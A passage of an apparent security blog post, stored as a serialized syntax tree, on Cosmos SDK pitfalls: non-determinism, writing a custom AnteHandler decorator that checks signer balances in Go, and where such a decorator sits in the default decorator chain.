",{"type":25,"tag":216,"props":82335,"children":82336},{"style":6947},[82337],{"type":31,"value":82338},"version",{"type":25,"tag":216,"props":82340,"children":82341},{"style":6964},[82342],{"type":31,"value":7465},{"type":25,"tag":216,"props":82344,"children":82345},{"class":6922,"line":7613},[82346,82351,82355,82359],{"type":25,"tag":216,"props":82347,"children":82348},{"style":6947},[82349],{"type":31,"value":82350},"        StoreInfos",{"type":25,"tag":216,"props":82352,"children":82353},{"style":6964},[82354],{"type":31,"value":19288},{"type":25,"tag":216,"props":82356,"children":82357},{"style":6947},[82358],{"type":31,"value":82200},{"type":25,"tag":216,"props":82360,"children":82361},{"style":6964},[82362],{"type":31,"value":7465},{"type":25,"tag":216,"props":82364,"children":82365},{"class":6922,"line":7636},[82366],{"type":25,"tag":216,"props":82367,"children":82368},{"style":6964},[82369],{"type":31,"value":7311},{"type":25,"tag":216,"props":82371,"children":82372},{"class":6922,"line":7645},[82373],{"type":25,"tag":216,"props":82374,"children":82375},{"style":6964},[82376],{"type":31,"value":7874},{"type":25,"tag":38,"props":82378,"children":82379},{},[82380,82382,82389,82390,82397],{"type":31,"value":82381},"Other factors contributing to determinism issues are the usage of ",{"type":25,"tag":162,"props":82383,"children":82386},{"href":82384,"rel":82385},"https://medium.com/provenanceblockchain/discovering-non-deterministic-behavior-in-provenance-blockchain-and-cosmos-sdk-3b81b87b8698",[166],[82387],{"type":31,"value":82388},"time-sensitive functions",{"type":31,"value":1307},{"type":25,"tag":162,"props":82391,"children":82394},{"href":82392,"rel":82393},"https://github.com/cosmos/cosmos-sdk/issues/16638",[166],[82395],{"type":31,"value":82396},"race conditions",{"type":31,"value":179},{"type":25,"tag":26,"props":82399,"children":82401},{"id":82400},"thou-shalt-not-passor-should-you",[82402],{"type":31,"value":82403},"Thou Shalt Not Pass...Or Should You?",{"type":25,"tag":38,"props":82405,"children":82406},{},[82407,82409,82415,82416,82422],{"type":31,"value":82408},"When developing smart contracts, it is common to delegate certain low-level tasks (such as parsing ",{"type":25,"tag":82,"props":82410,"children":82412},{"className":82411},[],[82413],{"type":31,"value":82414},"msg.value",{"type":31,"value":7026},{"type":25,"tag":82,"props":82417,"children":82419},{"className":82418},[],[82420],{"type":31,"value":82421},"msg.sender",{"type":31,"value":82423},", and collecting transaction fees) to the underlying blockchain.",{"type":25,"tag":38,"props":82425,"children":82426},{},[82427,82429,82435,82437,82443],{"type":31,"value":82428},"On Cosmos, there is no blockchain to rely on since it is the L1 itself! To simplify the development of middleware-like functionalities, ",{"type":25,"tag":82,"props":82430,"children":82432},{"className":82431},[],[82433],{"type":31,"value":82434},"Cosmos-SDK",{"type":31,"value":82436}," introduces ",{"type":25,"tag":82,"props":82438,"children":82440},{"className":82439},[],[82441],{"type":31,"value":82442},"AnteHandler",{"type":31,"value":82444}," decorators to help accomplish this. While there are pre-written decorators, all other data extraction from transactions and blockchain states must be carried out by the developers themselves.",{"type":25,"tag":38,"props":82446,"children":82447},{},[82448,82450,82455,82457,82462],{"type":31,"value":82449},"To provide context, let's first understand how an ",{"type":25,"tag":82,"props":82451,"children":82453},{"className":82452},[],[82454],{"type":31,"value":82442},{"type":31,"value":82456}," is processed. Each ",{"type":25,"tag":82,"props":82458,"children":82460},{"className":82459},[],[82461],{"type":31,"value":82442},{"type":31,"value":82463}," is a state transition function that can:",{"type":25,"tag":6711,"props":82465,"children":82466},{},[82467,82472],{"type":25,"tag":2043,"props":82468,"children":82469},{},[82470],{"type":31,"value":82471},"Transform the block state in relation to transaction and execution context.",{"type":25,"tag":2043,"props":82473,"children":82474},{},[82475,82477],{"type":31,"value":82476},"Determine the course of action for the transaction.\n",{"type":25,"tag":6711,"props":82478,"children":82479},{},[82480,82491],{"type":25,"tag":2043,"props":82481,"children":82482},{},[82483,82485,82490],{"type":31,"value":82484},"Pass the transaction to the next ",{"type":25,"tag":82,"props":82486,"children":82488},{"className":82487},[],[82489],{"type":31,"value":82442},{"type":31,"value":179},{"type":25,"tag":2043,"props":82492,"children":82493},{},[82494],{"type":31,"value":82495},"Return error for transaction.",{"type":25,"tag":38,"props":82497,"children":82498},{},[82499,82501,82506],{"type":31,"value":82500},"The bad news is that developing an ",{"type":25,"tag":82,"props":82502,"children":82504},{"className":82503},[],[82505],{"type":31,"value":82442},{"type":31,"value":82507}," is not the easiest task. For instance, let's consider a scenario where we need to ensure all signers involved in a transaction have a balance greater than X at the time of transaction execution.",{"type":25,"tag":38,"props":82509,"children":82510},{},[82511,82512,82518],{"type":31,"value":474},{"type":25,"tag":82,"props":82513,"children":82515},{"className":82514},[],[82516],{"type":31,"value":82517},"AnteHandle",{"type":31,"value":82519}," implementation may look something like this:",{"type":25,"tag":206,"props":82521,"children":82523},{"code":82522,"language":80136,"meta":7,"className":80137,"style":7},"const (\n    MIN_BALANCE = 100\n)\n\nfunc (abd AccountBalanceDecorator) AnteHandle(\n    ctx sdk.Context,\n    tx sdk.Tx,\n    simulate bool,\n    next sdk.AnteHandler,\n) (sdk.Context, error) {\n    sigTx, ok := tx.(authsigning.SigVerifiableTx)\n    if !ok {\n        return ctx, errorsmod.Wrap(\n            sdkerrors.ErrTxDecode,\n            \"invalid tx type\",\n        )\n    }\n\n    signers := sigTx.GetSigners()\n    for i, signer := range signers {\n        balance := abd.bk.getBalance(ctx, signer, ATOM)\n        if balance.Amount \u003C MIN_BALANCE {\n            return ctx, errorsmod.Wrap(\n                ErrInsufficientBalance,\n                \"Insufficient Balance\",\n            )\n        }\n    }\n\n    return next(ctx, tx, simulate)\n}\n",[82524],{"type":25,"tag":82,"props":82525,"children":82526},{"__ignoreMap":7},[82527,82539,82555,82562,82569,82602,82626,82651,82667,82691,82723,82771,82790,82823,82844,82856,82863,82870,82877,82907,82943,83007,83041,83073,83085,83097,83104,83111,83118,83125,83167],{"type":25,"tag":216,"props":82528,"children":82529},{"class":6922,"line":6923},[82530,82534],{"type":25,"tag":216,"props":82531,"children":82532},{"style":6936},[82533],{"type":31,"value":13611},{"type":25,"tag":216,"props":82535,"children":82536},{"style":6964},[82537],{"type":31,"value":82538}," (\n",{"type":25,"tag":216,"props":82540,"children":82541},{"class":6922,"line":6769},[82542,82547,82551],{"type":25,"tag":216,"props":82543,"children":82544},{"style":6947},[82545],{"type":31,"value":82546},"    MIN_BALANCE",{"type":25,"tag":216,"props":82548,"children":82549},{"style":6953},[82550],{"type":31,"value":6956},{"type":25,"tag":216,"props":82552,"children":82553},{"style":6989},[82554],{"type":31,"value":23302},{"type":25,"tag":216,"props":82556,"children":82557},{"class":6922,"line":6778},[82558],{"type":25,"tag":216,"props":82559,"children":82560},{"style":6964},[82561],{"type":31,"value":7107},{"type":25,"tag":216,"props":82563,"children":82564},{"class":6922,"line":7005},[82565],{"type":25,"tag":216,"props":82566,"children":82567},{"emptyLinePlaceholder":16},[82568],{"type":31,"value":7642},{"type":25,"tag":216,"props":82570,"children":82571},{"class":6922,"line":7110},[82572,82576,82580,82585,82590,82594,82598],{"type":25,"tag":216,"props":82573,"children":82574},{"style":6936},[82575],{"type":31,"value":80272},{"type":25,"tag":216,"props":82577,"children":82578},{"style":6964},[82579],{"type":31,"value":7016},{"type":25,"tag":216,"props":82581,"children":82582},{"style":6947},[82583],{"type":31,"value":82584},"abd ",{"type":25,"tag":216,"props":82586,"children":82587},{"style":7375},[82588],{"type":31,"value":82589},"AccountBalanceDecorator",{"type":25,"tag":216,"props":82591,"children":82592},{"style":6964},[82593],{"type":31,"value":7036},{"type":25,"tag":216,"props":82595,"children":82596},{"style":7047},[82597],{"type":31,"value":82517},{"type":25,"tag":216,"props":82599,"children":82600},{"style":6964},[82601],{"type":31,"value":7420},{"type":25,"tag":216,"props":82603,"children":82604},{"class":6922,"line":7216},[82605,82609,82614,82618,82622],{"type":25,"tag":216,"props":82606,"children":82607},{"style":6947},[82608],{"type":31,"value":24183},{"type":25,"tag":216,"props":82610,"children":82611},{"style":7375},[82612],{"type":31,"value":82613}," sdk",{"type":25,"tag":216,"props":82615,"children":82616},{"style":6964},[82617],{"type":31,"value":179},{"type":25,"tag":216,"props":82619,"children":82620},{"style":7375},[82621],{"type":31,"value":80321},{"type":25,"tag":216,"props":82623,"children":82624},{"style":6964},[82625],{"type":31,"value":7465},{"type":25,"tag":216,"props":82627,"children":82628},{"class":6922,"line":7244},[82629,82634,82638,82642,82647],{"type":25,"tag":216,"props":82630,"children":82631},{"style":6947},[82632],{"type":31,"value":82633},"    tx",{"type":25,"tag":216,"props":82635,"children":82636},{"style":7375},[82637],{"type":31,"value":82613},{"type":25,"tag":216,"props":82639,"children":82640},{"style":6964},[82641],{"type":31,"value":179},{"type":25,"tag":216,"props":82643,"children":82644},{"style":7375},[82645],{"type":31,"value":82646},"Tx",{"type":25,"tag":216,"props":82648,"children":82649},{"style":6964},[82650],{"type":31,"value":7465},{"type":25,"tag":216,"props":82652,"children":82653},{"class":6922,"line":7257},[82654,82659,82663],{"type":25,"tag":216,"props":82655,"children":82656},{"style":6947},[82657],{"type":31,"value":82658},"    simulate",{"type":25,"tag":216,"props":82660,"children":82661},{"style":7375},[82662],{"type":31,"value":16006},{"type":25,"tag":216,"props":82664,"children":82665},{"style":6964},[82666],{"type":31,"value":7465},{"type":25,"tag":216,"props":82668,"children":82669},{"class":6922,"line":7275},[82670,82675,82679,82683,82687],{"type":25,"tag":216,"props":82671,"children":82672},{"style":6947},[82673],{"type":31,"value":82674},"    next",{"type":25,"tag":216,"props":82676,"children":82677},{"style":7375},[82678],{"type":31,"value":82613},{"type":25,"tag":216,"props":82680,"children":82681},{"style":6964},[82682],{"type":31,"value":179},{"type":25,"tag":216,"props":82684,"children":82685},{"style":7375},[82686],{"type":31,"value":82442},{"type":25,"tag":216,"props":82688,"children":82689},{"style":6964},[82690],{"type":31,"value":7465},{"type":25,"tag":216,"props":82692,"children":82693},{"class":6922,"line":7296},[82694,82698,82703,82707,82711,82715,82719],{"type":25,"tag":216,"props":82695,"children":82696},{"style":6964},[82697],{"type":31,"value":80354},{"type":25,"tag":216,"props":82699,"children":82700},{"style":7375},[82701],{"type":31,"value":82702},"sdk",{"type":25,"tag":216,"props":82704,"children":82705},{"style":6964},[82706],{"type":31,"value":179},{"type":25,"tag":216,"props":82708,"children":82709},{"style":7375},[82710],{"type":31,"value":80321},{"type":25,"tag":216,"props":82712,"children":82713},{"style":6964},[82714],{"type":31,"value":7026},{"type":25,"tag":216,"props":82716,"children":82717},{"style":7375},[82718],{"type":31,"value":18821},{"type":25,"tag":216,"props":82720,"children":82721},{"style":6964},[82722],{"type":31,"value":18761},{"type":25,"tag":216,"props":82724,"children":82725},{"class":6922,"line":7305},[82726,82731,82735,82740,82744,82748,82753,82758,82762,82767],{"type":25,"tag":216,"props":82727,"children":82728},{"style":6947},[82729],{"type":31,"value":82730},"    sigTx",{"type":25,"tag":216,"props":82732,"children":82733},{"style":6964},[82734],{"type":31,"value":7026},{"type":25,"tag":216,"props":82736,"children":82737},{"style":6947},[82738],{"type":31,"value":82739},"ok",{"type":25,"tag":216,"props":82741,"children":82742},{"style":6953},[82743],{"type":31,"value":80388},{"type":25,"tag":216,"props":82745,"children":82746},{"style":6947},[82747],{"type":31,"value":71997},{"type":25,"tag":216,"props":82749,"children":82750},{"style":6964},[82751],{"type":31,"value":82752},".(",{"type":25,"tag":216,"props":82754,"children":82755},{"style":7375},[82756],{"type":31,"value":82757},"authsigning",{"type":25,"tag":216,"props":82759,"children":82760},{"style":6964},[82761],{"type":31,"value":179},{"type":25,"tag":216,"props":82763,"children":82764},{"style":7375},[82765],{"type":31,"value":82766},"SigVerifiableTx",{"type":25,"tag":216,"props":82768,"children":82769},{"style":6964},[82770],{"type":31,"value":7107},{"type":25,"tag":216,"props":82772,"children":82773},{"class":6922,"line":7557},[82774,82778,82782,82786],{"type":25,"tag":216,"props":82775,"children":82776},{"style":6973},[82777],{"type":31,"value":16235},{"type":25,"tag":216,"props":82779,"children":82780},{"style":6953},[82781],{"type":31,"value":16820},{"type":25,"tag":216,"props":82783,"children":82784},{"style":6947},[82785],{"type":31,"value":82739},{"type":25,"tag":216,"props":82787,"children":82788},{"style":6964},[82789],{"type":31,"value":7241},{"type":25,"tag":216,"props":82791,"children":82792},{"class":6922,"line":7574},[82793,82797,82801,82805,82810,82814,82819],{"type":25,"tag":216,"props":82794,"children":82795},{"style":6973},[82796],{"type":31,"value":19702},{"type":25,"tag":216,"props":82798,"children":82799},{"style":6947},[82800],{"type":31,"value":29801},{"type":25,"tag":216,"props":82802,"children":82803},{"style":6964},[82804],{"type":31,"value":7026},{"type":25,"tag":216,"props":82806,"children":82807},{"style":6947},[82808],{"type":31,"value":82809},"errorsmod",{"type":25,"tag":216,"props":82811,"children":82812},{"style":6964},[82813],{"type":31,"value":179},{"type":25,"tag":216,"props":82815,"children":82816},{"style":7047},[82817],{"type":31,"value":82818},"Wrap",{"type":25,"tag":216,"props":82820,"children":82821},{"style":6964},[82822],{"type":31,"value":7420},{"type":25,"tag":216,"props":82824,"children":82825},{"class":6922,"line":7591},[82826,82831,82835,82840],{"type":25,"tag":216,"props":82827,"children":82828},{"style":6947},[82829],{"type":31,"value":82830},"            sdkerrors",{"type":25,"tag":216,"props":82832,"children":82833},{"style":6964},[82834],{"type":31,"value":179},{"type":25,"tag":216,"props":82836,"children":82837},{"style":6947},[82838],{"type":31,"value":82839},"ErrTxDecode",{"type":25,"tag":216,"props":82841,"children":82842},{"style":6964},[82843],{"type":31,"value":7465},{"type":25,"tag":216,"props":82845,"children":82846},{"class":6922,"line":7604},[82847,82852],{"type":25,"tag":216,"props":82848,"children":82849},{"style":8205},[82850],{"type":31,"value":82851},"            \"invalid tx type\"",{"type":25,"tag":216,"props":82853,"children":82854},{"style":6964},[82855],{"type":31,"value":7465},{"type":25,"tag":216,"props":82857,"children":82858},{"class":6922,"line":7613},[82859],{"type":25,"tag":216,"props":82860,"children":82861},{"style":6964},[82862],{"type":31,"value":72290},{"type":25,"tag":216,"props":82864,"children":82865},{"class":6922,"line":7636},[82866],{"type":25,"tag":216,"props":82867,"children":82868},{"style":6964},[82869],{"type":31,"value":7311},{"type":25,"tag":216,"props":82871,"children":82872},{"class":6922,"line":7645},[82873],{"type":25,"tag":216,"props":82874,"children":82875},{"emptyLinePlaceholder":16},[82876],{"type":31,"value":7642},{"type":25,"tag":216,"props":82878,"children":82879},{"class":6922,"line":7654},[82880,82885,82889,82894,82898,82903],{"type":25,"tag":216,"props":82881,"children":82882},{"style":6947},[82883],{"type":31,"value":82884},"    signers",{"type":25,"tag":216,"props":82886,"children":82887},{"style":6953},[82888],{"type":31,"value":80388},{"type":25,"tag":216,"props":82890,"children":82891},{"style":6947},[82892],{"type":31,"value":82893}," sigTx",{"type":25,"tag":216,"props":82895,"children":82896},{"style":6964},[82897],{"type":31,"value":179},{"type":25,"tag":216,"props":82899,"children":82900},{"style":7047},[82901],{"type":31,"value":82902},"GetSigners",{"type":25,"tag":216,"props":82904,"children":82905},{"style":6964},[82906],{"type":31,"value":11687},{"type":25,"tag":216,"props":82908,"children":82909},{"class":6922,"line":7722},[82910,82914,82918,82922,82926,82930,82934,82939],{"type":25,"tag":216,"props":82911,"children":82912},{"style":6973},[82913],{"type":31,"value":6976},{"type":25,"tag":216,"props":82915,"children":82916},{"style":6947},[82917],{"type":31,"value":7354},{"type":25,"tag":216,"props":82919,"children":82920},{"style":6964},[82921],{"type":31,"value":7026},{"type":25,"tag":216,"props":82923,"children":82924},{"style":6947},[82925],{"type":31,"value":11098},{"type":25,"tag":216,"props":82927,"children":82928},{"style":6953},[82929],{"type":31,"value":80388},{"type":25,"tag":216,"props":82931,"children":82932},{"style":6973},[82933],{"type":31,"value":81371},{"type":25,"tag":216,"props":82935,"children":82936},{"style":6947},[82937],{"type":31,"value":82938}," signers",{"type":25,"tag":216,"props":82940,"children":82941},{"style":6964},[82942],{"type":31,"value":7241},{"type":25,"tag":216,"props":82944,"children":82945},{"class":6922,"line":7730},[82946,82951,82955,82960,82964,82969,82973,82978,82982,82986,82990,82994,82998,83003],{"type":25,"tag":216,"props":82947,"children":82948},{"style":6947},[82949],{"type":31,"value":82950},"        balance",{"type":25,"tag":216,"props":82952,"children":82953},{"style":6953},[82954],{"type":31,"value":80388},{"type":25,"tag":216,"props":82956,"children":82957},{"style":6947},[82958],{"type":31,"value":82959}," abd",{"type":25,"tag":216,"props":82961,"children":82962},{"style":6964},[82963],{"type":31,"value":179},{"type":25,"tag":216,"props":82965,"children":82966},{"style":6947},[82967],{"type":31,"value":82968},"bk",{"type":25,"tag":216,"props":82970,"children":82971},{"style":6964},[82972],{"type":31,"value":179},{"type":25,"tag":216,"props":82974,"children":82975},{"style":7047},[82976],{"type":31,"value":82977},"getBalance",{"type":25,"tag":216,"props":82979,"children":82980},{"style":6964},[82981],{"type":31,"value":1850},{"type":25,"tag":216,"props":82983,"children":82984},{"style":6947},[82985],{"type":31,"value":24240},{"type":25,"tag":216,"props":82987,"children":82988},{"style":6964},[82989],{"type":31,"value":7026},{"type":25,"tag":216,"props":82991,"children":82992},{"style":6947},[82993],{"type":31,"value":11098},{"type":25,"tag":216,"props":82995,"children":82996},{"style":6964},[82997],{"type":31,"value":7026},{"type":25,"tag":216,"props":82999,"children":83000},{"style":6947},[83001],{"type":31,"value":83002},"ATOM",{"type":25,"tag":216,"props":83004,"children":83005},{"style":6964},[83006],{"type":31,"value":7107},{"type":25,"tag":216,"props":83008,"children":83009},{"class":6922,"line":7760},[83010,83014,83019,83023,83028,83032,83037],{"type":25,"tag":216,"props":83011,"children":83012},{"style":6973},[83013],{"type":31,"value":7222},{"type":25,"tag":216,"props":83015,"children":83016},{"style":6947},[83017],{"type":31,"value":83018}," balance",{"type":25,"tag":216,"props":83020,"children":83021},{"style":6964},[83022],{"type":31,"value":179},{"type":25,"tag":216,"props":83024,"children":83025},{"style":6947},[83026],{"type":31,"value":83027},"Amount",{"type":25,"tag":216,"props":83029,"children":83030},{"style":6953},[83031],{"type":31,"value":12672},{"type":25,"tag":216,"props":83033,"children":83034},{"style":6947},[83035],{"type":31,"value":83036}," MIN_BALANCE",{"type":25,"tag":216,"props":83038,"children":83039},{"style":6964},[83040],{"type":31,"value":7241},{"type":25,"tag":216,"props":83042,"children":83043},{"class":6922,"line":7768},[83044,83049,83053,83057,83061,83065,83069],{"type":25,"tag":216,"props":83045,"children":83046},{"style":6973},[83047],{"type":31,"value":83048},"            return",{"type":25,"tag":216,"props":83050,"children":83051},{"style":6947},[83052],{"type":31,"value":29801},{"type":25,"tag":216,"props":83054,"children":83055},{"style":6964},[83056],{"type":31,"value":7026},{"type":25,"tag":216,"props":83058,"children":83059},{"style":6947},[83060],{"type":31,"value":82809},{"type":25,"tag":216,"props":83062,"children":83063},{"style":6964},[83064],{"type":31,"value":179},{"type":25,"tag":216,"props":83066,"children":83067},{"style":7047},[83068],{"type":31,"value":82818},{"type":25,"tag":216,"props":83070,"children":83071},{"style":6964},[83072],{"type":31,"value":7420},{"type":25,"tag":216,"props":83074,"children":83075},{"class":6922,"line":7800},[83076,83081],{"type":25,"tag":216,"props":83077,"children":83078},{"style":6947},[83079],{"type":31,"value":83080},"                ErrInsufficientBalance",{"type":25,"tag":216,"props":83082,"children":83083},{"style":6964},[83084],{"type":31,"value":7465},{"type":25,"tag":216,"props":83086,"children":83087},{"class":6922,"line":7808},[83088,83093],{"type":25,"tag":216,"props":83089,"children":83090},{"style":8205},[83091],{"type":31,"value":83092},"                \"Insufficient Balance\"",{"type":25,"tag":216,"props":83094,"children":83095},{"style":6964},[83096],{"type":31,"value":7465},{"type":25,"tag":216,"props":83098,"children":83099},{"class":6922,"line":7868},[83100],{"type":25,"tag":216,"props":83101,"children":83102},{"style":6964},[83103],{"type":31,"value":81487},{"type":25,"tag":216,"props":83105,"children":83106},{"class":6922,"line":13001},[83107],{"type":25,"tag":216,"props":83108,"children":83109},{"style":6964},[83110],{"type":31,"value":7302},{"type":25,"tag":216,"props":83112,"children":83113},{"class":6922,"line":13019},[83114],{"type":25,"tag":216,"props":83115,"children":83116},{"style":6964},[83117],{"type":31,"value":7311},{"type":25,"tag":216,"props":83119,"children":83120},{"class":6922,"line":13064},[83121],{"type":25,"tag":216,"props":83122,"children":83123},{"emptyLinePlaceholder":16},[83124],{"type":31,"value":7642},{"type":25,"tag":216,"props":83126,"children":83127},{"class":6922,"line":13170},[83128,83132,83137,83141,83145,83149,83154,83158,83163],{"type":25,"tag":216,"props":83129,"children":83130},{"style":6973},[83131],{"type":31,"value":20947},{"type":25,"tag":216,"props":83133,"children":83134},{"style":7047},[83135],{"type":31,"value":83136}," next",{"type":25,"tag":216,"props":83138,"children":83139},{"style":6964},[83140],{"type":31,"value":1850},{"type":25,"tag":216,"props":83142,"children":83143},{"style":6947},[83144],{"type":31,"value":24240},{"type":25,"tag":216,"props":83146,"children":83147},{"style":6964},[83148],{"type":31,"value":7026},{"type":25,"tag":216,"props":83150,"children":83151},{"style":6947},[83152],{"type":31,"value":83153},"tx",{"type":25,"tag":216,"props":83155,"children":83156},{"style":6964},[83157],{"type":31,"value":7026},{"type":25,"tag":216,"props":83159,"children":83160},{"style":6947},[83161],{"type":31,"value":83162},"simulate",{"type":25,"tag":216,"props":83164,"children":83165},{"style":6964},[83166],{"type":31,"value":7107},{"type":25,"tag":216,"props":83168,"children":83169},{"class":6922,"line":27455},[83170],{"type":25,"tag":216,"props":83171,"children":83172},{"style":6964},[83173],{"type":31,"value":7874},{"type":25,"tag":38,"props":83175,"children":83176},{},[83177,83179,83184,83186,83192,83194,83200],{"type":31,"value":83178},"Where should this custom ",{"type":25,"tag":82,"props":83180,"children":83182},{"className":83181},[],[83183],{"type":31,"value":82442},{"type":31,"value":83185}," be placed relative to other ",{"type":25,"tag":82,"props":83187,"children":83189},{"className":83188},[],[83190],{"type":31,"value":83191},"AnteHandlers",{"type":31,"value":83193}," provided by cosmos-sdk?\nConsidering that we are only concerned with transactions that satisfy our check, inserting it right after the ",{"type":25,"tag":82,"props":83195,"children":83197},{"className":83196},[],[83198],{"type":31,"value":83199},"SetUpContextDecorator",{"type":31,"value":83201}," should work, right?",{"type":25,"tag":38,"props":83203,"children":83204},{},[83205],{"type":25,"tag":162,"props":83206,"children":83209},{"href":83207,"rel":83208},"https://github.com/cosmos/cosmos-sdk/blob/f0aec3f30dd952e1b4b3a5b25e0412c1af5baaac/x/auth/ante/ante.go#L41",[166],[83210],{"type":31,"value":80711},{"type":25,"tag":206,"props":83212,"children":83214},{"code":83213,"language":80136,"meta":7,"className":80137,"style":7},"anteDecorators := []sdk.AnteDecorator{\n    NewSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n    // INSERT HERE\n    NewExtensionOptionsDecorator(options.ExtensionOptionChecker),\n    NewValidateBasicDecorator(),\n    NewTxTimeoutHeightDecorator(),\n    NewValidateMemoDecorator(options.AccountKeeper),\n    NewConsumeGasForTxSizeDecorator(options.AccountKeeper),\n    NewDeductFeeDecorator(options.AccountKeeper, options.BankKeeper, options.FeegrantKeeper, options.TxFeeChecker),\n    NewSetPubKeyDecorator(options.AccountKeeper), // SetPubKeyDecorator must be called before all signature verification decorators\n    NewValidateSigCountDecorator(options.AccountKeeper),\n    NewSigGasConsumeDecorator(options.AccountKeeper, options.SigGasConsumer),\n    NewSigVerificationDecorator(options.AccountKeeper, options.SignModeHandler),\n    NewIncrementSequenceDecorator(options.AccountKeeper),\n}\n",[83215],{"type":25,"tag":82,"props":83216,"children":83217},{"__ignoreMap":7},[83218,83251,83268,83276,83305,83317,83329,83358,83386,83465,83498,83526,83571,83616,83644],{"type":25,"tag":216,"props":83219,"children":83220},{"class":6922,"line":6923},[83221,83226,83230,83234,83238,83242,83247],{"type":25,"tag":216,"props":83222,"children":83223},{"style":6947},[83224],{"type":31,"value":83225},"anteDecorators",{"type":25,"tag":216,"props":83227,"children":83228},{"style":6953},[83229],{"type":31,"value":80388},{"type":25,"tag":216,"props":83231,"children":83232},{"style":6964},[83233],{"type":31,"value":80199},{"type":25,"tag":216,"props":83235,"children":83236},{"style":7375},[83237],{"type":31,"value":82702},{"type":25,"tag":216,"props":83239,"children":83240},{"style":6964},[83241],{"type":31,"value":179},{"type":25,"tag":216,"props":83243,"children":83244},{"style":7375},[83245],{"type":31,"value":83246},"AnteDecorator",{"type":25,"tag":216,"props":83248,"children":83249},{"style":6964},[83250],{"type":31,"value":14836},{"type":25,"tag":216,"props":83252,"children":83253},{"class":6922,"line":6769},[83254,83259,83263],{"type":25,"tag":216,"props":83255,"children":83256},{"style":7047},[83257],{"type":31,"value":83258},"    NewSetUpContextDecorator",{"type":25,"tag":216,"props":83260,"children":83261},{"style":6964},[83262],{"type":31,"value":22334},{"type":25,"tag":216,"props":83264,"children":83265},{"style":6927},[83266],{"type":31,"value":83267},"// outermost AnteDecorator. SetUpContext must be called first\n",{"type":25,"tag":216,"props":83269,"children":83270},{"class":6922,"line":6778},[83271],{"type":25,"tag":216,"props":83272,"children":83273},{"style":6927},[83274],{"type":31,"value":83275},"    // INSERT HERE\n",{"type":25,"tag":216,"props":83277,"children":83278},{"class":6922,"line":7005},[83279,83284,83288,83292,83296,83301],{"type":25,"tag":216,"props":83280,"children":83281},{"style":7047},[83282],{"type":31,"value":83283},"    NewExtensionOptionsDecorator",{"type":25,"tag":216,"props":83285,"children":83286},{"style":6964},[83287],{"type":31,"value":1850},{"type":25,"tag":216,"props":83289,"children":83290},{"style":6947},[83291],{"type":31,"value":40001},{"type":25,"tag":216,"props":83293,"children":83294},{"style":6964},[83295],{"type":31,"value":179},{"type":25,"tag":216,"props":83297,"children":83298},{"style":6947},[83299],{"type":31,"value":83300},"ExtensionOptionChecker",{"type":25,"tag":216,"props":83302,"children":83303},{"style":6964},[83304],{"type":31,"value":10688},{"type":25,"tag":216,"props":83306,"children":83307},{"class":6922,"line":7110},[83308,83313],{"type":25,"tag":216,"props":83309,"children":83310},{"style":7047},[83311],{"type":31,"value":83312},"    NewValidateBasicDecorator",{"type":25,"tag":216,"props":83314,"children":83315},{"style":6964},[83316],{"type":31,"value":7448},{"type":25,"tag":216,"props":83318,"children":83319},{"class":6922,"line":7216},[83320,83325],{"type":25,"tag":216,"props":83321,"children":83322},{"style":7047},[83323],{"type":31,"value":83324},"    NewTxTimeoutHeightDecorator",{"type":25,"tag":216,"props":83326,"children":83327},{"style":6964},[83328],{"type":31,"value":7448},{"type":25,"tag":216,"props":83330,"children":83331},{"class":6922,"line":7244},[83332,83337,83341,83345,83349,83354],{"type":25,"tag":216,"props":83333,"children":83334},{"style":7047},[83335],{"type":31,"value":83336},"    NewValidateMemoDecorator",{"type":25,"tag":216,"props":83338,"children":83339},{"style":6964},[83340],{"type":31,"value":1850},{"type":25,"tag":216,"props":83342,"children":83343},{"style":6947},[83344],{"type":31,"value":40001},{"type":25,"tag":216,"props":83346,"children":83347},{"style":6964},[83348],{"type":31,"value":179},{"type":25,"tag":216,"props":83350,"children":83351},{"style":6947},[83352],{"type":31,"value":83353},"AccountKeeper",{"type":25,"tag":216,"props":83355,"children":83356},{"style":6964},[83357],{"type":31,"value":10688},{"type":25,"tag":216,"props":83359,"children":83360},{"class":6922,"line":7257},[83361,83366,83370,83374,83378,83382],{"type":25,"tag":216,"props":83362,"children":83363},{"style":7047},[83364],{"type":31,"value":83365},"    NewConsumeGasForTxSizeDecorator",{"type":25,"tag":216,"props":83367,"children":83368},{"style":6964},[83369],{"type":31,"value":1850},{"type":25,"tag":216,"props":83371,"children":83372},{"style":6947},[83373],{"type":31,"value":40001},{"type":25,"tag":216,"props":83375,"children":83376},{"style":6964},[83377],{"type":31,"value":179},{"type":25,"tag":216,"props":83379,"children":83380},{"style":6947},[83381],{"type":31,"value":83353},{"type":25,"tag":216,"props":83383,"children":83384},{"style":6964},[83385],{"type":31,"value":10688},{"type":25,"tag":216,"props":83387,"children":83388},{"class":6922,"line":7275},[83389,83394,83398,83402,83406,83410,83414,83418,83422,83427,83431,83435,83439,83444,83448,83452,83456,83461],{"type":25,"tag":216,"props":83390,"children":83391},{"style":7047},[83392],{"type":31,"value":83393},"    NewDeductFeeDecorator",{"type":25,"tag":216,"props":83395,"children":83396},{"style":6964},[83397],{"type":31,"value":1850},{"type":25,"tag":216,"props":83399,"children":83400},{"style":6947},[83401],{"type":31,"value":40001},{"type":25,"tag":216,"props":83403,"children":83404},{"style":6964},[83405],{"type":31,"value":179},{"type":25,"tag":216,"props":83407,"children":83408},{"style":6947},[83409],{"type":31,"value":83353},{"type":25,"tag":216,"props":83411,"children":83412},{"style":6964},[83413],{"type":31,"value":7026},{"type":25,"tag":216,"props":83415,"children":83416},{"style":6947},[83417],{"type":31,"value":40001},{"type":25,"tag":216,"props":83419,"children":83420},{"style":6964},[83421],{"type":31,"value":179},{"type":25,"tag":216,"props":83423,"children":83424},{"style":6947},[83425],{"type":31,"value":83426},"BankKeeper",{"type":25,"tag":216,"props":83428,"children":83429},{"style":6964},[83430],{"type":31,"value":7026},{"type":25,"tag":216,"props":83432,"children":83433},{"style":6947},[83434],{"type":31,"value":40001},{"type":25,"tag":216,"props":83436,"children":83437},{"style":6964},[83438],{"type":31,"value":179},{"type":25,"tag":216,"props":83440,"children":83441},{"style":6947},[83442],{"type":31,"value":83443},"FeegrantKeeper",{"type":25,"tag":216,"props":83445,"children":83446},{"style":6964},[83447],{"type":31,"value":7026},{"type":25,"tag":216,"props":83449,"children":83450},{"style":6947},[83451],{"type":31,"value":40001},{"type":25,"tag":216,"props":83453,"children":83454},{"style":6964},[83455],{"type":31,"value":179},{"type":25,"tag":216,"props":83457,"children":83458},{"style":6947},[83459],{"type":31,"value":83460},"TxFeeChecker",{"type":25,"tag":216,"props":83462,"children":83463},{"style":6964},[83464],{"type"